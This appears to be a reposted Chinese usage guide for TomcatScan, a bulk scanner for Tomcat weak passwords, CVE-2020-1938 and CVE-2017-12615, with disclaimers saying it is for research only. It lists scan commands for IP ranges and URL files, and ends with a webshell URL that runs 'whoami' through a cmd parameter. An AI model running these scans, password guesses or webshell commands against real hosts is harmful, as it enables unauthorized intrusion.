####################
免责声明:工具本身并无好坏,希望大家以遵守《网络安全法》相关法律为前提来使用该工具,支持研究学习,切勿用于非法犯罪活动,对于恶意使用该工具造成的损失,和本人及开发者无关。
####################
python3 Tomcatscan.py -u xxx -p xx
//对指定端口进行漏洞探测以及弱口令检测,同时会检测8009端口cve-2020-1938漏洞
python TomcatScan.py -H 192.168.1.1-192.168.2.255
//默认检测8080,8081,80,443,8009端口,如需深入探测,可以先利用信息收集工具收集tomcat url保存到文件中后通过 -f参数检测
python TomcatScan.py -f url.txt
#-f 参数 文件中ip的几种格式:
http://192.168.1.1:8080
##检测8080端口,同时检测8009端口是否存在cve_2020_1938
http://192.168.1.1
##检测80端口和443端口,同时检测8009端口是否存在cve_2020_1938
https://192.168.1.1
##检测80端口和443端口,同时检测8009端口是否存在cve_2020_1938
192.168.1.1
##检测80端口和443端口,同时检测8009端口是否存在cve_2020_1938
192.168.1.1:8080
##检测8080端口和443端口,同时检测8009端口是否存在cve_2020_1938
弱口令检测请在dict目录添加用户名密码字典
cve-2017-12615 shell利用:访问并执行命令
http://192.168.3.137:8080/1635405387.jsp?&pwd=023&cmd=whoami
原文始发于微信公众号(菜鸟小新):Tomcatscan:Tomcat漏洞批量检测工具
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论